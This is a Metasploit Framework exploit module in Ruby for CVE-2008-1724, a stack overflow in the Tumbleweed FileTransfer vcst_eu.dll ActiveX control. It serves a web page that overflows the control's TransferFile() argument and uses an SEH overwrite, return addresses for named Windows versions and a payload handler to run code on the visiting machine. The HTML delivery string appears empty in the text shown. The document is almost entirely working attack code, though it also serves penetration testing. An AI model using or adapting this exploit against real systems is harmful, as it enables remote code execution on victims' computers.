## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the vcst_eu.dll FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed SecureTransport suite. By sending an overly long string to the TransferFile() 'remotefile' function, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => 'patrick', 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1724'], [ 'OSVDB', '44252'], [ 'URL', 'http://www.aushack.com/200708-tumbleweed.txt' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0<>()\"\\", }, 'Platform' => 'win', 'Targets' => [ # Patrick - tested successfully against W2KSP0 EN, W2KSP4 EN, XPSP0 EN, 2007/08/17. [ 'Universal vcst_eu.dll', { 'Ret' => 0x1001ee75 } ], [ 'Windows 2000 Pro English', { 'Ret' => 0x75022ac4 } ], [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], ], 'DisclosureDate' => '07 Apr 2008', 'DefaultTarget' => 0)) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Randomize some things vname = rand_text_alpha(rand(100) + 1) vurl = rand_text_alpha(rand(100) + 1) vhostName = rand_text_alpha(rand(100) + 1) vlocalFile = rand_text_alpha(rand(100) + 1) vMD5 = rand_text_alpha(rand(100) + 1) # Build the exploit buffer filler = rand_text_alpha(4620) seh = generate_seh_payload(target.ret) sploit = filler + seh # Build out the message content = %Q| | print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end